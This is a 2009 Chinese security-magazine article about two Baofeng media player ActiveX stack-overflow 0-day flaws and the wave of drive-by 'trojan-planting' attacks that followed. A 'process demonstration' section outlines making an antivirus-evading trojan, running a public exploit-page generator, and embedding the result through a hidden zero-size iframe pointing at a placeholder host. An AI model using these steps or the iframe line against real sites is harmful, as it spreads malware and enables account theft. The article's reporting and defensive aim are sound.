暴风漏洞 引发挂马“流感”

安全阵线

苗得雨 · 2009年5月11日 第18期

惊人的漏洞利用速度

4月30日

有数千万用户的媒体播放软件暴风影音爆出0Day漏洞,黑客可以利用该漏洞进行挂马,这意味着所有暴风影音用户访问被黑客挂马的网站后,都有可能被病毒入侵,盗取用户的各种账号。时间正值五一放假的前一天,很少有人注意到了这条漏洞公告。按照以往网络安全界的惯例,黑客在获取漏洞信息后,利用漏洞要延迟几天,研发出相关的利用工具也要一周之后。

安全小百科:所谓0Day漏洞就是黑客发现软件漏洞后,软件厂商还没有推出与漏洞相关的补丁。对于普通电脑用户而言,0Day漏洞是最危险的隐患,在没有有效防御手段的情况下,电脑如同在裸奔。但是他人的地狱也往往是自己的天堂,对于黑客而言0Day漏洞是最好的终极武器,因为这是一把可以穿透许多盾牌的利剑。

5月1日

所有的一切都没有按照人们预期的进程发展,在5月1日这天,国内许多网站纷纷遭到有计划的挂马,而黑客挂马利用的就是前一天刚刚爆出的暴风影音0Day漏洞(图1),无数访问了这些网站的用户被病毒入侵。5月1日这天也是网游高峰,网游账号成了“流感”重灾区。

18-f07-01.jpg
18-f07-02.jpg
18-f07-03.jpg

令人瞠目结舌的是,这些网页木马都是用专门针对0Day漏洞的《暴风影音0Day生成器》生成的。黑客利用挂马工具开始大范围地投入实战之中,这种速度完全颠覆了以往所有的游戏规则,让危险第一次如此快速地侵入了网络。

在这一次的0Day事件中,黑客不仅快速地利用了才公布一天的漏洞研发出攻击工具,并且特别选在了节假日期间利用此漏洞,这样的时间设计显然是为了让处于放假期间的安全公司来不及反应,以便挂马攻击安装有暴风影音的用户。

挂马漏洞有两个

这一次暴风影音曝光的漏洞其实是两个,一个名为“暴风影音2009(mps.dll)ActiveX远程栈溢出漏洞”,它的问题出在暴风影音的“mps.dll”文件中,当负责下载视频的参数Sub OnBeforeVideoDownload(ByVal URL As String)下载的URL是一个超长字符串时,程序不会进行检验,这就会导致溢出,攻击者可以利用堆填充技术执行任意代码。

另外一个漏洞名为“暴风影音2009(Config.dll)ActiveX远程栈溢出漏洞”,漏洞出现在“Config.dll”文件中。在暴风影音ActiveX程序的参数中,当Sub SetAttributeValue (ByVal lpQueryStr As String ,ByVal bstrAttributeName As String ,ByVal lpValueStr As String)中的lpQueryStr的数值为一个超长字符串时,程序就会溢出,攻击者同样可以利用堆填充技术执行任意代码。

此时我们可以非常清楚地看到,这两个漏洞犯了同样的致命错误,就是没有检验程序参数的字符串长度。

这就如同一个国内航空公司赠送了你一张空白机票,空白机票上有三个空格,允许你填写国内任何三个汉字以内的城市名称,你填写好城市名称后,飞机就会按照你的要求飞到你所填写的城市。

但是此时你发现,虽然空白机票上只有三个空格,但是实际上你可以写入任意长度的名称,自动飞行系统并不会检查城市名称长度是否有问题。

于是作为乘客的你就可以在机票上写“西班牙巴塞罗那”或者“俄罗斯莫斯科”,飞机一样会飞到这些航空公司不允许它飞到的地方。

第一个漏洞与2007年暴风影音的一个漏洞极为相似,同样是出在mps.dll文件上,对URL链接的检测工作没有做好而导致的问题(图2)。

18-f07-04.jpg

而且这次0Day利用工具之所以会如此快地出现在互联网中,很大程度上与暴风影音的漏洞利用简单不无关系。

挂马流程演示

现在暴风影音0Day漏洞的专用挂马生成器,网络中已经可以下载了,也就是说现在任何一个人都可以使用生成器生成一个暴风影音0Day网页木马进行挂马,而且使用生成器挂马的方式异常简单。

第一步:黑客会首先制作一个免杀木马,他们会选择用灰鸽子、PCShare或SRAT等任何他们喜欢的木马生成一个服务端,然后通过更改杀毒软件识别的特征码躲过杀毒软件的追杀,再加上一层UPXShelll之类的壳,加强躲过杀毒软件的能力,然后将免杀的木马服务端上传到黑客指定的网站中。

第二步:打开《暴风影音0Day生成器》(图3),在程序地址框中输入刚才上传的免杀木马地址,然后点击“生成”按键。此时生成器会在默认目录下生成两个文件,一个名为BF.htm的HTML文件和一个名为sfbf.css的CSS文件。

18-f07-05.jpg

第三步:将生成的两个文件上传到指定的网站中,然后再使用框架命令代码:

<iframe src=http://www.test.com/bf.htm width=0 height=0></iframe>

将BF.htm文件嵌入到想挂马的网站即可。黑客还可以对BF.htm进行加密,让该文件绕过杀毒软件的查杀。

漏洞解决方法

暴风影音官方推出了漏洞的补丁(下载地址:http://www.shudoo.com/bzsoft),安装补丁后即可堵上漏洞。此外,我们还可以使用一些具有网页木马拦截功能的安全辅助工具。